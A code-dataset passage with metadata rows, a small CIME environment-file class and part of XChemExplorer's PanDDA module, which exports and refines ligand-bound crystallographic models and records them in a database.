| 24.678571 | 68 | 0.727931 | 98 | 691 | 4.959184 | 0.622449 | 0.012346 | 0.012346 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011925 | 0.150507 | 691 | 27 | 69 | 25.592593 | 0.816014 | 0.124457 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.368421 | 0 | 0.473684 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fe7f812fda345139b99dd24f883eb46ae8bf8541 | 609 | py | Python | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2020-08-28T14:57:15.000Z | 2020-08-28T14:57:15.000Z | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | null | null | null | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2021-03-11T23:20:58.000Z | 2021-03-11T23:20:58.000Z | """
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema)
| 33.833333 | 91 | 0.714286 | 84 | 609 | 4.880952 | 0.595238 | 0.058537 | 0.080488 | 0.078049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175698 | 609 | 17 | 92 | 35.823529 | 0.816733 | 0.292282 | 0 | 0 | 0 | 0 | 0.115 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
fe87ead9a791db821c1f883b4076bac8b4dc4efb | 99,064 | py | Python | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 2 | 2018-03-11T08:38:43.000Z | 2021-09-25T07:46:44.000Z | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 208 | 2017-06-30T10:32:12.000Z | 2022-03-29T10:38:32.000Z | lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 7b0779387705ab37074d80f77baf22891eb56907 | [
"MIT"
] | 6 | 2017-06-01T20:33:31.000Z | 2021-10-04T09:44:09.000Z | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
class export_and_refine_ligand_bound_models(QtCore.QThread):
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
try:
progress_step = float(1/len(modelsDict))
except TypeError:
self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
self.Logfile.warning('emapLigandDict' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
def find_new_models(self,modelsDict):
samples_to_export = {}
self.Logfile.hint('XCE will never export/ refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
except (ValueError, IndexError), e:
self.Logfile.error(str(e))
return samples_to_export
def event_map_to_sf(self,resolution,emapLigandDict):
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
def refine_exported_model(self,xtal):
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
class run_pandda_export(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
self.import_samples_into_datasouce(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def import_samples_into_datasouce(self,samples_to_export):
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
self.Logfile.insert('reding pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
self.Logfile.insert('add to site_list_:' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
